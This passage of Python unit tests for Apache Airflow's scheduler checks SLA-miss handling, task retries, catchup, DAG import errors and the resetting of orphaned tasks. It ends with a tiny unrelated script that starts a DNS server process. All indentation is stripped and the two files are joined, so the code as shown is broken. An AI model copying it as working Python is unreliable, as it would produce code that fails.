mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Make email sending fail so we can verify that the exception is logged gracefully
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='test@test.com',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss record for this task and execution date
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks that the scheduler does not put a task in limbo when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.orm.DagBag', return_value=dagbag)
@mock.patch('airflow.orm.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# not asserting ti.state == State.SCHEDULED here because the scheduler
# will have moved the state from SCHEDULED to QUEUED
# now that the executor has been cleared the task should be allowed to re-queue,
# but tasks that stay in executor.queued_tasks after executor.heartbeat()
# will be set back to the SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.RUNNING)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
# 5s to wait for child process to exit, 1s dummy sleep
# in scheduler loop to prevent excessive logs and 1s for last loop to finish.
self.assertLess(run_duration - expected_run_duration, 6.0)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a sys.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception as _:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# No_dags is empty, _invalid_ is ignored by .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEquals(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
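# only the task instance belonging to dr2 (the dagrun passed as the filter) should be reset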
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEquals(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEquals(State.SCHEDULED, ti1.state)
self.assertEquals(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEquals(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEquals(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
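# only orphaned TIs that belong to the RUNNING dagrun (dr1) are expected to be reset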
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
dns_test.py
|
from multiprocessing import Process

from DnsServer import dns_server

if __name__ == '__main__':
    # Start the DNS server in a separate process so it does not block the caller.
    p_dns = Process(target=dns_server, args=())
    p_dns.start()
|